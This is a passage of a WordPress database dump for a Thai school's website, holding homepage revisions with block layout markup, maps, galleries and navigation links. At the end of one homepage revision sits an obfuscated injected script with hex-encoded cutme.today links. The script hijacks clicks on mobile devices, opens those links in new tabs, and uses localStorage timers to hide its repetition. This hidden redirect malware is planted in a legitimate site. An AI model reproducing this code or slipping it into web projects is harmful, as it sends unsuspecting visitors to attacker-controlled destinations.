/wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-21 10:50:24','2025-07-21 03:50:24','',14,'http://pakhaeng.ssk.in.th/?p=1905',0,'revision','',0),
(1907,1,'2025-07-24 10:43:02','2025-07-24 03:43:02','','การลา','','inherit','','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a5%e0%b8%b2','','','2025-07-24 10:43:02','2025-07-24 03:43:02','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา.png',0,'attachment','image/png',0),
(1908,1,'2025-07-24 10:43:30','2025-07-24 03:43:30','','การลา','','inherit','','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a5%e0%b8%b2-2','','','2025-07-24 10:43:30','2025-07-24 03:43:30','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png',0,'attachment','image/png',0),
(1909,1,'2025-07-24 10:43:36','2025-07-24 03:43:36','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[1904],\"type\":\"grid\",\"imageRatio\":\"land169\",\"linkTo\":\"custom\",\"captionStyles\":[{\"size\":[\"\",\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":6,\"textTransform\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"background\":\"#000000\",\"backgroundOpacity\":0.5}],\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":1904,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=1904\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbyztUtl8EM-IiB9-zUQiX6uZlpuS1009A7GnLyQYTDE88aCpW5lZ-fTDR-YT54UB2_i/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" 